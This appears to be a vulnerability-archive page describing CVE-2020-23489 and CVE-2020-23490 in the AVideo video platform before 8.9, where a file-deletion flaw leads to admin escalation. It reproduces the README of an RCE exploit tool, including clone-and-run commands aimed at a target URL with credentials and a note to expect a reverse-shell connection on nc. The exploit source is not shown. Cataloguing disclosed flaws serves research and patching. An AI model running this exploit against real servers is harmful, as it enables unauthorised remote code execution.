Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-23489 PoC — Wwbn Avideo 安全漏洞

Source
Associated Vulnerability
Title:Wwbn Avideo 安全漏洞 (CVE-2020-23489)
Description:Wwbn Avideo是Wwbn团队的一个由PHP编写的视频平台建站系统。 Avideo 8.9之前版本存在安全漏洞,该漏洞源于import.json.php文件有文件删除漏洞。这允许删除configuration.php,这将导致某些特权检查不到位,因此用户可以将特权升级为admin。
Description
RCE exploit for AVideo < 8.9 (CVE-2020-23489 & CVE-2020-23490)
Readme
# AVideo3xploit.go

RCE exploit for [AVideo](https://github.com/WWBN/AVideo/) 

```
root@kali:~# go get github.com/fatih/color
root@kali:~# git clone https://github.com/ahussam/AVideo3xploit.git
root@kali:~# cd AVideo3xploit
root@kali:~/AVideo3xploit# go run AVideo3xploit.go http://[target]/avideo/ username password
```

You should get a connection on your nc 

![avideo-5](av-5.png)

## Write-up 

https://cube01.io/blog/Avideo-Remote-Code-Execution.html

## CVE 

CVE-2020-23489 & CVE-2020-23490

File Snapshot

[4.0K] /data/pocs/611ebe00cf46acb9aaabcae62a9350af289908de ├── [360K] av-5.png ├── [4.6K] AVideo3xploit.go └── [ 501] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.